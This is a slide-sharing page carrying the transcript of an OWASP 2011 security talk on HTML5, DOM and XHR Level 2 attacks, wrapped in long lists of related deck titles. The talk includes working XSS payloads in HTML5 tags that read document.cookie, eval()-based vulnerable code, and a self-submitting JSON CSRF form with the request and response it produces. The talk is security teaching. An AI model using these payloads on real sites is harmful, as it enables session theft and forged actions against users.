HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahFind me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
HTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsHTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applications
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 

Recently uploaded (20)

Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

  • 1. Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP 22nd Sept. 2011 OWASP AppSec USA 2011 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com shreeraj@blueinfy.com Who Am I? http://www.blueinfy.com Founder & Director Blueinfy Solutions Pvt. Ltd. SecurityExposure.com Past experience Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking OWASP 2
  • 3. Agenda Next Generation Application’s Attack Surface and Threat Model HTML 5 – Tags, Storage & WebSQL DOM – Vulnerabilities & Exploits Abusing Sockets, XHR & CSRF ClickJacking & Exploting Rich HTML Components Reverse Engineering across DOM OWASP 3
  • 5. Real Life Cases Last three years – several application reviewed (Banking, Trading, Portals, Web 2.0 sites etc…) Interesting outcomes and stats Auto scanning is becoming increasingly difficult and impossible in some cases Sites are vulnerable and easily exploitable in many cases OWASP 5
  • 6. Technology Shift & Trend • Android • iPhone/Pad • HTML 5 Other • • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • JS • Storage• Flex • XHR • XAML Server side Components • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP 6
  • 7. Browser Model Mobile HTML5 Silverlight Flash Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Storage XHR WebSocket Plug-in Sockets Browser Native Network Services Network & Access Same Origin Policy (SOP) Sandbox Core Policies OWASP 7 7
  • 8. Layers Presentation HTML5 Silverlight Flash/Flex Process & Logic JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. Network & Access XHR – Level 2 WebSockets Plugin-Sockets Core Policies SOP Sandboxing for iframe Shared Resources OWASP 8
  • 9. Application Architecture Trading Weather Ajax Email RIA (Flash) Banking HTML / JS / DOM End Client Browser Blog Stack Internet Internet Web Services Web Server Data-access Application Server Database Auth. Access Authentication Server OWASP 9
  • 10. Attack Surface Expansion JSON/XML streams POST name HTTP Response and value pairs variables XML/JSON QueryString etc. Ajax RIA (Flash) HTTP variables Cookie etc. DOM calls/events HTML / JS / DOM File attachments uploads etc. API - streams Open APIs and Feeds and other integrated streams party information OWASP 1 10 0
  • 11. AppSec dynamics Source - OWASP OWASP 11 11
  • 12. Integration and Communications DOM glues everything – It integrates Flex, Silverlight and HTML if needed Various ways to communicate – native browser way, using XHR and WebSockets Options for data sharing – JSON, XML, WCF, AMF etc. (many more) Browsers are supporting new set of technologies and exposing the surface OWASP 12
  • 13. Demos App using DOM, AJAX and Web Services HTML 5 components and usage Fingerprinting Application Assets from DOM or JavaScripts Frameworks, Scripts, Structures, and so on – DWR/Struts OWASP 13
  • 14. Threat Model Sandbox attacks 7 1 XSS abuse with 8 Abusing new features and ClickJacking tags and attributes like drag-and-drop Events Tags & Attributes Thick Features Presentation Injecting and Exploiting WebSQL WebSQL DOM Storage 4 3 Stealing from 2 DOM based XSS the storage Parser/Threads Process & Logic and Redirects 5 XHR WebSocket Plug-in Sockets Abusing network Network API and Sockets Browser Native Network Services & Access CSRF 6 Core across streams Same Origin Policy (SOP) Sandbox Policies 9 Threats to widgets Botnet/Spynet using 10 OWASP WebWorkers 14 and mashups
  • 15. Mapping top 10 – Current Context A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL. A2 – XSS : DOM based XSS, Script injection through , Direct third party streams, HTML5 tags A3 – Broken Authentication and Session Management: Reverse Engineering Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage A4 – Insecure Direct Object Referencing : Insecure Data Access Level calls from browser. A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing) A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from reverse engineering A8 – Unvalidated Redirects : DOM-based redirects and spoofing A9 – Insecure Crypto Storage : Local storage inside browser and Global variables A10 – Insufficient Transport Layer Protection : Ajax and other calls going over non-SSL channels. Mobile 10 … OWASP 15
  • 16. HTML 5 – TAGS, STORAGE & WEBSQL OWASP 1 16 6
  • 17. Abusing HTML 5 Tags Various new tags and can be abused, may not be filtered or validated Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> OWASP 17
  • 18. Attacking Storage HTML 5 is having local storage and can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 18
  • 19. Attacking Storage It is possible to steal them through XSS or via JavaScript getItem and setItem calls XSS the box and scan through storage OWASP 19
  • 20. DOM Storage Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 20
  • 21. What is wrong? OWASP 21
  • 22. By default its Global Here is the line of code temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function() OWASP 22
  • 23. DOM stealing It is possible to get these variables and clear text information – user/pass Responses and tokens Business information XHR calls and HTTP request/responses Dummy XHR object injection Lot of possibilities for exploitation OWASP 23
  • 24. Demo DOMTracer and profiling Accessing username and password OWASP 24
  • 25. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 25
  • 26. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 26
  • 27. DOM – VULNERABILITIES & EXPLOITS OWASP 27
  • 28. DOM Architecture OWASP 28
  • 29. DOM Calls Ajax/Flash/Silverlight – Async Calls HTML / CSS / RIA Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) OWASP 29
  • 30. DOM Calls JSON XML JS-Script JS-Object JS-Array OWASP 30
  • 31. DOM based XSS It is a sleeping giant in the Ajax applications Root cause DOM is already loaded Application is single page and DOM remains same New information coming needs to be injected in using various DOM calls like eval() Information is coming from untrusted sources OWASP 31
  • 32. Example cases Various different way DOM based XSS can take place Example Simple DOM function using URL to process ajax calls Third party content going into existing DOM and call is not secure Ajax call from application, what if we make a direct call to the link – JSON may cause XSS OWASP 32
  • 33. DOM based URL parsing Ajax applications are already loaded and developers may be using static function to pass arguments from URL For example hu = window.location.search.substring(1); Above parameter is going to following ajax function eval('getProduct('+ koko.toString()+')'); DOM based XSS OWASP 33
  • 34. Demo Scanning with DOMScan Injecting payload in the call OWASP 34
  • 35. Third Party Streaming Documents Attacker News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash/Silver) Internet App HTML / JS / DOM Blog Database Authentication Stream Application Infrastructure eval() Web Services End point XSS OWASP 35
  • 36. Stream processing if (http.readyState == 4) { var response = http.responseText; var p = eval("(" + response + ")"); document.open(); document.write(p.firstName+"<br>"); document.write(p.lastName+"<br>"); document.write(p.phoneNumbers[0]); document.close(); OWASP 36
  • 37. Polluting Streams XML/ JS-Object / JS-Array / JS-Script / JSON attacker 8008 proxy Web app DB Web Server Web app DB Web app Stream Web Client eval() XSS OWASP 37
  • 38. Exploiting DOM calls document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… Example of vulnerable document.attachEvent(…) Calls document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…) OWASP 38
  • 39. Demo Sample call demo DOMScan to identify vulnerability OWASP 39
  • 40. Direct Ajax Call Ajax function would be making a back-end call Back-end would be returning JSON stream or any other and get injected in DOM In some libraries their content type would allow them to get loaded in browser directly In that case bypassing DOM processing… OWASP 40
  • 41. Demo DWR/JSON call – bypassing and direct stream access OWASP 41
  • 42. ABUSING SOCKETS, XHR & CSRF OWASP 42
  • 43. Abusing network calls HTML 5 provides WebSocket and XHR Level 2 calls It allows to make cross domains call and raw socket capabilities It can be leveraged by JavaScript payload Malware or worm can use it to perform several scanning tasks OWASP 43
  • 44. Internal Scanning Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. Some browsers have blocked these calls for security reason. OWASP 44
  • 45. XHR/CSRF ETC. OWASP 45
  • 46. XHR – Level 2 calls XHR is now level 2 on browser Various browser behavior is different XHR is already implemented Shared resource policy implemented “orgin” and “access-*” tags and decisions based on that Potential abuses One way stealth channel CSRF possible (no cookie though) Header changes CROS - http://www.w3.org/TR/cors/ (Cross Origin Request Sharing) OWASP 46
  • 47. CSRF CSRF is possible with Web 2.0 streams by abusing DOM calls XML manipulations CSRF with JSON AMX is also XML stream Attacker injects simple HTML payload Initiate a request from browser to target cross domain OWASP 47
  • 48. How it works? OWASP 48
  • 49. JSON <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST"> <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 49
  • 50. HTTP Req. POST /json/jservice.ashx HTTP/1.1 Host: 192.168.100.2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: text/plain Content-Length: 57 {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo OWASP 50
  • 51. HTTP Resp. HTTP/1.1 200 OK Date: Sat, 17 Jul 2010 09:14:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/plain; charset=utf-8 Content-Length: 1135 {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}} OWASP 51
